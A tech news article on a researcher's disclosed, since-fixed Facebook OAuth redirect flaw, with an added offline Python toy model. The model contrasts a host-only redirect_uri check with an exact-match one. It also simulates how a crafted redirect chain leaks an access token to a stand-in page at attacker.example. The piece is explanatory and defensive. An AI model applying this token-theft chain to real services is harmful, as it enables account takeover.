Over the past few weeks, hackers have been exploiting the seemingly endless holes in that security nightmare called Java to hit Web and social giants including Google, Facebook, Tumblr, Twitter and Pinterest.
Meanwhile, security researcher Nir Goldshlager turned up further proof of the accidental back doors into the digital worlds so many of us trust with so much of our lives. His find doesn't even involve Java, Oracle's inexplicably popular stinking mess of a platform.
On Friday, Feb. 22, Goldshlager posted a walkthrough on his blog of how he discovered and exploited “one of my favorite flaws” in Facebook’s application system.
The flaw was in Facebook's implementation of OAuth, the authorization protocol that lets an app act on a user's behalf without learning the user's password. Specifically, it was in how Facebook read and validated the redirect address (the redirect_uri parameter) that tells the site where to send the user, along with the user's access token, once the login dialog is done.
When someone creates a Facebook app (Facebook's own Messages and Pages features are apps too), the app is assigned an ID number, the client_id in OAuth terms, under which Facebook tracks the app and its settings.
Each app ID is tied to the one website it is registered to redirect to. A login request that asks to send the user anywhere else gets an error. This is an example of Facebook's security doing what it is supposed to.
But Goldshlager found that the check only insisted the destination be somewhere on Facebook's own site: he could point the redirect at other parts of Facebook's Web addresses rather than the single website the app ID was tied to.
He then chained that hop inside Facebook to another app's page, one that forwarded the user on to a website he had set up. Because the access token rides along in the redirected address, his site received the token (and with it permission to do anything to the victim's profile that the token allowed) and stored it in a file.
On its own, though, this would still have stopped at the permission dialog, which tells the user exactly what the app is asking to do (read or send messages, update status, add or remove friends) and so would tip the victim off.
Goldshlager figured out that if the request named an official Facebook app, like Messages, as the client, Facebook treated it as already approved and skipped the permission dialog entirely, handing the attacker a token good for whatever that app was allowed to do, with the victim seeing nothing.
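To make the mechanics concrete, here is a toy model of the redirect chain the last several paragraphs describe, from the app-ID redirect check through the skipped permission dialog. It is an added example written for this article, not Facebook's code and not Goldshlager's proof of concept. It puts a host-only redirect check next to the exact-match check the OAuth specification calls for, and simulates the browser carrying the access token (which the implicit grant puts in the URL fragment) across a redirector on the trusted host to an attacker's page. The hosts www.example-social.com and attacker.example, the /l.php redirector, the registered redirect URI and the token value are all constructed; the page does not say which Facebook path Goldshlager actually routed through.

```python
"""Toy model of an OAuth implicit-grant redirect chain with a weak redirect_uri check.

Added illustration only: not Facebook's code, not Goldshlager's proof of concept.
Hosts, the /l.php redirector, the registered URI and the token are constructed.
"""
from typing import Callable, Optional
from urllib.parse import parse_qs, urlsplit, urlunsplit

TRUSTED_HOST = "www.example-social.com"
# The one redirect URI registered for the hypothetical pre-authorized
# first-party "Messages" app.
REGISTERED_REDIRECT = f"https://{TRUSTED_HOST}/messages/"
# Constructed "leaving the site" endpoint on the trusted host:
# GET /l.php?u=<target> answers with a 302 to <target>.  It stands in for the
# internal hop the article describes; the real path is not given on this page.
OPEN_REDIRECT_PATH = "/l.php"
TOKEN = "tok_constructed_123"  # constructed token value


def weak_redirect_check(redirect_uri: str) -> bool:
    """Accepts any URI on the trusted host: scheme and host only.
    This is the class of check the article describes being bypassed."""
    got, reg = urlsplit(redirect_uri), urlsplit(REGISTERED_REDIRECT)
    return got.scheme == reg.scheme and got.netloc == reg.netloc


def strict_redirect_check(redirect_uri: str) -> bool:
    """Simple string comparison against the registered URI (RFC 6749 section
    3.1.2.3), after rejecting fragments and dot-segments that a browser or the
    server's router might normalise into something else."""
    got = urlsplit(redirect_uri)
    if got.fragment or any(seg in (".", "..") for seg in got.path.split("/")):
        return False
    return urlunsplit((got.scheme, got.netloc, got.path, got.query, "")) == REGISTERED_REDIRECT


def authorize(redirect_uri: str, check: Callable[[str], bool]) -> str:
    """Authorization endpoint for a pre-authorized app: no consent dialog is
    shown, and the implicit grant returns the token in the URL fragment."""
    if not check(redirect_uri):
        raise ValueError("redirect_uri does not match the app's registration")
    p = urlsplit(redirect_uri)
    return urlunsplit((p.scheme, p.netloc, p.path, p.query,
                       f"access_token={TOKEN}&expires_in=3600"))


def trusted_host_routes(url_no_fragment: str) -> Optional[str]:
    """Models the trusted host's routing: returns the Location header for a
    redirect, or None when the URL is a final page."""
    p = urlsplit(url_no_fragment)
    if p.netloc == TRUSTED_HOST and p.path == OPEN_REDIRECT_PATH:
        return parse_qs(p.query).get("u", [None])[0]
    return None


def browser_follow(url: str, max_hops: int = 5) -> str:
    """Follows redirects the way a browser does: when a 3xx Location carries no
    fragment of its own, the current fragment is kept (RFC 7231 section 7.1.2),
    so '#access_token=...' rides along to the final destination."""
    for _ in range(max_hops):
        p = urlsplit(url)
        location = trusted_host_routes(urlunsplit((p.scheme, p.netloc, p.path, p.query, "")))
        if location is None:
            return url
        lp = urlsplit(location)
        url = urlunsplit((lp.scheme, lp.netloc, lp.path, lp.query, lp.fragment or p.fragment))
    raise RuntimeError("too many redirects")


def token_seen_by_attacker(check: Callable[[str], bool]) -> Optional[str]:
    """Runs the attack end to end under a given redirect_uri check and returns
    the token the attacker's page would read from window.location.hash, or
    None if the check blocked the request."""
    attacker_page = "https://attacker.example/steal"
    malicious = f"https://{TRUSTED_HOST}{OPEN_REDIRECT_PATH}?u={attacker_page}"
    try:
        start = authorize(malicious, check)
    except ValueError:
        return None
    final = browser_follow(start)
    if urlsplit(final).netloc != "attacker.example":
        return None
    return parse_qs(urlsplit(final).fragment).get("access_token", [None])[0]


if __name__ == "__main__":
    print("host-only check  ->", token_seen_by_attacker(weak_redirect_check))
    print("exact-match check->", token_seen_by_attacker(strict_redirect_check))
```

Under the host-only check the attacker's page ends up holding the token even though the redirect_uri pointed at the trusted host, because the browser keeps the fragment across the 302. Under the exact-match check the authorization request fails before any token is issued; the same check also rejects the dot-segment and hash-bang variants, which is why the specification insists on comparing the whole registered string rather than just the host.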
Goldshlager, being a nice guy and all (a white hat hacker, as such security types are called), didn't publish any of this until after Facebook had fixed the problem, so that no one else could pull it off.
He ends the blog post by saying there is definitely more where that came from, but he will keep holding it back until it can be shared without anyone being harmed.
Can't you just wait to see how vulnerable we are right now?